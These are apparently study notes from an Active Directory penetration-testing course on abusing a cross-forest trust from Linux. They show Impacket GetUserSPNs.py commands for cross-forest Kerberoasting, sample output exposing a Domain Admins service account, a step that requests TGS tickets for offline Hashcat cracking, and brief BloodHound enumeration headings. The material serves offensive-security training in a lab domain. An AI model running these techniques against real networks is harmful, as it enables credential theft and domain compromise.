π³Cross-Forest Trust Abuse From Linux
Cross-Forest Kerberoasting
Just like with Windows, we are able to perform similar operations from a Linux attack host
Using GetUserSPNS.py
We need credentials for a user we can authenticate into the other domain, which we can specify with the -target-domain flag.
GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------------------- -------- ------------------------------------------------------ -------------------------- --------- ----------
MSSQLsvc/sql01.freightlogstics:1433 mssqlsvc CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL 2022-03-24 15:47:52.488917 <never> We can use the -request flag to gives us the TGS ticket, and the -outputfile flag to choose a file to directly save it to. which we could attempt to crack offline with Hashcat and the mode 13100
GetUserSPNs.py -request -outputfile tgs.hash -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wleyHunting Foreign Group Membership
From the last section, we saw that may see users or admins from a domain as members of a group in another domain. On Linux we can gather information using bloodhound-python to collect data from multiple domains.
Adding DOMAIN Information to /etc/resolv.conf
We may need to change our DNS hostname for the targeted DC instead of an IP address, so we can edit our file like below to achieve this
Running bloodhound-python Against INLANEFREIGHT.LOCAL
Compressing the File
Viewing Dangerous Rights in BloodHound
Once we upload our data, we can click on Users with Foreign Domain Group Membership under the Analysis tab and select the source domain as INLANEFREIGHT.LOCAL.
Last updated
Was this helpful?